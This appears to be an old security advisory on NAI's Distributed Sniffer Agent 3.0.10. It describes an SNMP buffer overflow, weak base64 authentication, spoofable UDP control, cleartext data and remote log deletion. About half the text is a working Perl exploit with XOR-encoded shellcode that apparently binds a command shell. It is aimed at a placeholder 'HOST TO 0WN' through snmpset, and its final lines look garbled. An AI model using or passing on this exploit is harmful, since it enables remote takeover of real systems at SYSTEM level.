Distributed Sniffer Agent
NAI's Distributed Sniffer Agent
Kevin Start found following. This 'advisory' details a number of
problems with NAI's sniffer product. They have fixed the problems
in current versions on the sly so we have foregone notifying the
vendor. They saw fit to post an advisory on Microsoft's Netmon
today so 'all is fair in love and war' at least MS had the dignity
to announce their fixes.
NAI's Distributed Sniffer Agent can be overflowed remotely to
grant SYSTEM privilege. Additional vulnerabilities exist in the
management protocol to allow an attacker to recover logins
passwords, take control of the agent, and delete logs.
This has been tested with Agent version 3.0.10 using Windows NT
Workstation 4.0 SP6.
1. The most severe problem was an overflow during SNMP writes.
NAI elected to use a single community for both public and
private access simplifying the process of brute forcing the
community string. Once this string has been guessed, shellcode
can be written into any accessible object (sysName, for
example). The buffer is 256 bytes long with no character
restrictions as nulls are allowed when using hex mode as the
SNMP encoding. This attack can be launched completely blind
with one spoofed UDP packet. SYSTEM privilege can be gained
using this method.
2. Authentication was handled using base64 encoded logins and
passwords. Dsniff by Dugsong already includes a module for
capturing logins and passwords from the agent. Base64 encoding
was also used to obfuscate changes to the agent's user
3. All remote access to the agent is handled using UDP. Once a
user has authenticated to the agent, an attacker can inject
his own spoofed commands. Full control of the agent can be
gained in this manner. If the packet generation facility was
enabled, a packet flood could be initiated.
4. All data transferred from the agent is in cleartext, allowing
an attacker to recover data being sniffed on a remote network
5. Flooding the agent with false login requests can cause system
instability. A kernel fault was caused during testing.
6. Logs can be deleted remotely, allowing an attacker to delete
his own brute forcing attempts once he is successful.
# exploit for NAI Sniffer Agent 3.0.10
# Silently patched in later versions, although customers
# were not notified. No workaround was ever released.
$xoredport="88 88 "; # (4369) port XORed with 0x99
$egg ="
eb 07 90 aa 1c 9c 77 90 90 90 33 c0 50 f7 d0 50 59 f2
af 59 b1 c6 8b c7 48 80 30 99 e2 fa 60 8d 85 70 fe
ff ff 50 68 01 01 00 00 bb 77 be 6b 77 ff d3 61
90 90 90 90 33 f6 96 bb 99 3c 60 47 c1 eb 08 56
ff 13 8b d0 fc 33 c9 b1 0b 49 32 c0 ac 84 c0 75
f9 52 51 56 52 b3 40 ff 13 ab 59 5a e2 ec 32 c0
ac 84 c0 75 f9 b3 3c 56 ff 13 8b d0 fc 33 c9 b1
06 32 c0 ac 84 c0 75 f9 52 51 56 52 b3 40 ff 13
ab 59 5a e2 ec 83 c6 05 33 c0 50 40 50 40 50 ff 57 e8 93 6a 10 56 53
ff 57 ec 6a 02 53 ff 57 f0 33 c0 57 50 b0 0c ab
58 ab 40 ab 5f 48 50 57 56 ad 56 ff 57 c0 48 50
57 ad 56 ad 56 ff 57 c0 48 b0 44 89 07 57 ff 57
c4 33 c0 8b 46 f4 89 47 3c 89 47 40 8b 06 89 47
38 33 c0 66 b8 01 01 89 47 2c 57 57 33 c0 50 50
50 40 50 48 50 50 ad 56 33 c0 50 ff 57 c8 ff 76
f0 ff 57 cc ff 76 fc ff 57 cc 48 50 50 53 ff 57
f4 8b d8 33 c0 b4 04 50 c1 e8 04 50 ff 57 d4 8b
f0 33 c0 8b c8 b5 04 50 50 57 51 50 ff 77 a8 ff
57 d0 83 3f 01 7c 22 33 c0 50 57 ff 37 56 ff 77
a8 ff 57 dc 0b c0 74 2f 33 c0 50 ff 37 56 53 ff
57 f8 6a 50 ff 57 e0 eb c8 33 c0 50 b4 04 50 56
53 ff 57 fc 57 33 c9 51 50 56 ff 77 ac ff 57 d8
6a 50 ff 57 e0 eb aa 50 ff 57 e4 90 d2 dc cb d7
dc d5 aa ab 99 da eb fc f8 ed fc c9 f0 e9 fc 99
de fc ed ca ed f8 eb ed ec e9 d0 f7 ff f6 d8 99
da eb fc f8 ed fc c9 eb f6 fa fc ea ea d8 99 da
f5 f6 ea fc d1 f8 f7 fd f5 fc 99 c9 fc fc f2 d7
f8 f4 fc fd c9 f0 e9 fc 99 de f5 f6 fb f8 f5 d8
f5 f5 f6 fa 99 ce eb f0 ed fc df f0 f5 fc 99 cb
fc f8 fd df f0 f5 fc 99 ca f5 fc fc e9 99 dc e1
f0 ed c9 eb f6 fa fc ea ea 99 ce ca d6 da d2 aa
ab 99 ea f6 fa f2 fc ed 99 fb f0 f7 fd 99 f5 f0
ea ed fc f7 99 f8 fa fa fc e9 ed 99 ea fc f7 fd
99 eb fc fa ef 99 9b 99 $xoredport 99 99 99 99
99 99 99 99 99 99 99 99 fa f4 fd b7 fc e1 fc 99
ff ff ff ff ";
$offset = "00 c7 12 00 ";
$snmpset = "/usr/bin/snmpset";
$community = "public";
$objid = "system.sysName.0";
$offcount = 80;
$nopcount = 200;
@execstring = ("\" ", $offset x $offcount, "90 "x $nopcount, $egg,"
$host="HOST TO 0WN";
exec ("$snmpset $host $community $objid x @sploitstring");
Fixed in current versions.